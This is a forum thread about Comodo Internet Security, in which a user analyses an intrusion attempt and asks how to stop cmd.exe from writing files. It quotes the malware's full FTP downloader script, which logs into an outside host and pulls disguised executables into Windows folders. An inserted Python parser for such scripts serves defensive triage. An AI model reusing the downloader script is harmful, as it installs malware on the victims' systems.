If you ever come across Comodo’s CEO posts in these forums, as it occurred to me that being a new member you may not have read any of them yet, you may eventually confirm how much of a joker I was. You don’t have to believe me nor rely on my advice either.
During the exploit what did you see on the monitor?
What happened to the cmd.exe process (owned by WMIPrvSE.exe) after the exploit?
What alert/s did you actually get?
What alert/s did you actually allow?
Did you get a “run an executable” alert for cmd.exe and then grab a screenshot with Process Explorer during the 120 seconds that alert was going to stay on screen?
Did you allow some alerts to get those files on your HD? If so, what alerts?
I suppose again you never heard of egemen; anyway, I’ve read his posts asking members to set up a VPN to identify specific issues.
This way you would also be able to explain your test cases and your doubts to him directly.
Why?
Is it not funny to see 40 updated AVs fail to recognize a new malware?
Shouldn’t I be happy to have my system protected for free by a powerful proactive protection software like CIS, without having to update it hundreds of times a year like those failing AVs?
Just to be sure b.exe was a malware I started it with D+ in paranoid mode (that’s my default mode) and C:* present on “My Protected Files” list.
The first thing b.exe does is to create a 1.ftp file inside the %windir%/help folder.
Then it calls ftp.
So b.exe is just a downloader, so it’s not uncommon that it isn’t recognized as malware by AV engines.
These are the 1.ftp contents:
open smtp.atto.tv
user f
t
binary
get svchost32.exe C:\WINDOWS\help\svchost32.exe
get rundll32.exe C:\WINDOWS\help\rundll32.exe
get notepad16.exe C:\WINDOWS\notepad16.exe
bye
I have manually downloaded all three files and again sent them to VirusTotal.
These are the results:
svchost32.exe - 4 positives out of 39
rundll32.exe - 16 positives out of 39
notepad16.exe - 4 positives out of 40
Shouldn’t I be happy and laugh for not wasting my system resources running an AV on it?
How many questions! Why are you so interested in how this kind of intrusion attempt, which will never hurt your layered protected system(s), happened?
Replies:
1) Nothing. Unless by “monitor” you mean the TCP connection monitor; in that case I saw an established connection between the “system” process and a remote host.
2) It executes its given arguments and then terminates.
3) Many weeks have passed since the first intrusion attempt, so I’m not sure about my recall. I think the first alert was about a CMD.EXE attempt to create the FTP.EXE process.
4) Don’t remember… maybe to execute FTP.
5) Yes… but the screenshot was taken yesterday when I reproduced the intrusion attempt, leaving my system service exposed to the Internet.
6) Sorry, again I’m not sure about what I remember… Maybe I got an alert for an FTP attempt to create the C:\aa.exe file… so I checked the C: root and found there all the newly created files.
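As an added triage helper (not code from any poster in this thread), the following Python parses an ftp.exe command script of the shape quoted above (1.ftp) and summarises the remote host, credentials and the local paths it would write, which is what you would feed into a file-protection rule or a detection; the host, user and file names in the sample are constructed for this example.

```python
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Constructed sample in the same shape as the 1.ftp script quoted above;
# host, user and file names are made up for this example.
SAMPLE_FTP_SCRIPT = """open ftp.example.invalid
user dropper
secret
binary
get a.exe C:\\WINDOWS\\help\\a.exe
get b.exe C:\\WINDOWS\\b.exe
bye
"""

@dataclass
class FtpScriptSummary:
    host: Optional[str] = None
    user: Optional[str] = None
    password: Optional[str] = None
    downloads: List[Tuple[str, str]] = field(default_factory=list)  # (remote, local)

def parse_ftp_script(text: str) -> FtpScriptSummary:
    """Summarise what an ftp.exe script would do; the password may follow 'user' on its own line."""
    summary = FtpScriptSummary()
    expect_password = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if expect_password:  # bare line after 'user name' is the password (as in 1.ftp)
            summary.password = line
            expect_password = False
            continue
        cmd, *args = line.split()
        cmd = cmd.lower()
        if cmd == "open" and args:
            summary.host = args[0]
        elif cmd == "user" and args:
            summary.user = args[0]
            if len(args) > 1:
                summary.password = args[1]
            else:
                expect_password = True
        elif cmd == "get" and args:
            # 'get remote [local]': the local path is where the dropped file lands
            summary.downloads.append((args[0], args[1] if len(args) > 1 else args[0]))
    return summary
```

The local paths in `downloads` are the ones a “Protected File/Folders” rule for ftp.exe would have to cover.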
Thanks again for the suggestion layman.
Your instructions will work for sure if I follow them… but that will prevent CMD.EXE from running any executable (except those present in the “Allowed Application” list, as you stated).
However the topic is about preventing CMD.EXE from creating/modifying any file in a specified folder.
But your suggestion drove me to think again about the “ask”, “allow” and “block” access rights and the related exception list.
Then I got this idea:
I could set “Access Rights”->“Protected File/Folders” to “Block” and then eventually add exceptions to the “Allowed File/Folders” list.
Well… strangely enough, it doesn’t work the way it is supposed to.
Test batch file (e:\tt.bat):
echo > c:\Test.txt
ftp
If I set “Access Rights”->“Run an executable” to “block” then, when I start my test file, the ftp command is intercepted by D+, blocked without any alert, and the action recorded on the D+ events list.
But… if I set “Access Rights”->“Protected File/Folders” to “Block” then, when I start my test file, the C:\test.txt file is created anyway (!) ???
As always, the test was made with D+ in paranoid mode; I tried it also with the D+ option “trust on application digitally signed by Trusted Software Vendors” disabled.
It seems to me that this is a kind of “misbehaviour”, as the “block” default action doesn’t work for “Protected File/Folders” the way it works, for instance, for “Run an executable”.
As my CIS (ver 3.8.65951.477) is not updated, maybe this “misbehaviour” has already been fixed in later CIS versions.
Please, layman, can you try my test file/settings on your system too and let me know how it works?
You never confirmed the details of the exploit but you carried out all the possible practices to make the exploit work in the first place (e.g. having it bypass the firewall, with non-disabled vulnerable services exposed without any patch).
Your above quoted reply apparently mentions what supposedly happened by mixing yesterday and weeks past without any apparent reason.
Still, you never described what you actually did yesterday when you purposely got the exploit to activate again, apart from the fact that you disabled the firewall and got at least a D+ alert.
BTW it is not even clear what CIS configuration defaults (e.g. CIS Proactive Security) and D+ mode (e.g. D+ paranoid mode) you used many weeks ago.
As it is unlikely the exploit went undetected without triggering any alerts (even more so if D+ wasn’t disabled too).
Although you confirmed that the cmd.exe process (owned by WMIPrvSE.exe) automatically terminates itself, it is not clear either whether the cmd shell is visible on screen or on the taskbar.
Indeed your approach got me interested in many neglected details. I hope you don’t mind, as I never argued about having Sat-DSL or HSDPA for those who use a 56K connection…
I haven’t sent a PM to egemen yet, as I guess the first reply I’ll get would be: update your CIS and try again.
As I can’t update, if I PM egemen I bet I’m going to waste his time and mine.
I told you already that my system is actually already configured to prevent the scenario I was involved in weeks ago… yet even the very first intrusion attempt was intercepted by F+ (in safe mode), and if I hadn’t allowed the incoming connection the intrusion attempt would have failed immediately.
However I have to note that non-“advanced user” and non-English-speaking people may reply to the alert allowing the incoming connection without really knowing what’s going to happen.
That’s not my case… I was just curious about the intrusion attempt (the first ever I was aware of… ’cause any previous ones were blocked by the Windows firewall without any alert) and I posted here how it works just as a record of an “all day” still-running intrusion attempt that threatens a lot of Internet users (at least a lot of Italians).
But the topic of this discussion is not “how to prevent” that kind of intrusion attempt… it’s how to prevent a process from writing/modifying files/folders on a specified path.
So, from now on, I’m sorry, I won’t reply to any more questions regarding the intrusion attempt I mentioned.
Yesterday (the day before) I was with CIS in proactive mode and D+ in paranoid mode, and I was alerted of a CMD.EXE attempt to create a new file (see the picture attached to the first post) because I had already added C:* to the “My Protected Files” list.
I told you already that “nothing” is/was visible on the monitor/screen/display.
No more off topic please…
instead…
could you please set CMD.EXE “Access Rights”->“Protected File/Folders” to “Block”, try to create a new file from the command prompt, and then tell me whether D+ has blocked the file creation attempt or not?
Ok, you are not willing to send a PM to egemen but you are willing to provide conjectures about that.
Yep, you are not interested in many aspects of the exploit+payload itself but you are willing to provide a conjecture about what other users would do in order to let the exploit attempt start.
You were curious about the payload (what the exploit attempt to do) but not about the exploit.
You chose to mention the exploit scenario, but this doesn’t mean the details about the exploit should be neglected because you were willing only to mention the payload.
As you purposely let the exploit hit your system, it is somewhat confusing to provide an approximate description of the exploit behavior apart from mentioning that you disabled the firewall and got an alert. It would help if you clarified some aspects of the exploit during its activation, but apparently you are not willing to, supposedly because you got the impression you already told them, although a detailed and thorough description of all alerts and visible activities in a single specific post (e.g. using the CIS proactive defaults), without mixing two different events (e.g. yesterday and weeks past), would provide way more info than unclear snippets all around this topic.
Despite apparently not, or else there would be no explanation, e.g., for your OT outburst of “enjoyment”.
Then you apparently got your answer even before creating this topic, although coincidentally you are unable to provide a description of what alerts were going to be displayed using the CIS proactive config defaults (BTW the above quoted re-configuration is unlikely to trigger only the single alert pertaining to the payload you attached to your first post).
BTW your reply was:
Thanks for confirming that the first part of the reply was meant for monitor/screen/display.
Guess I got confused by what you suggested “monitor” was. I wondered how many monitors you implicitly implied and thus what monitor your “nothing” reply was about.
BTW you introduced the actual topic span with your first post yourself, despite the title mentioning only a part of it…
Thus, despite the topic title, your intention not to clarify the exploit further and your apparent discomfort/reluctance to have a developer analyze it along with the command-line payload (and not the payload alone) are unexpected.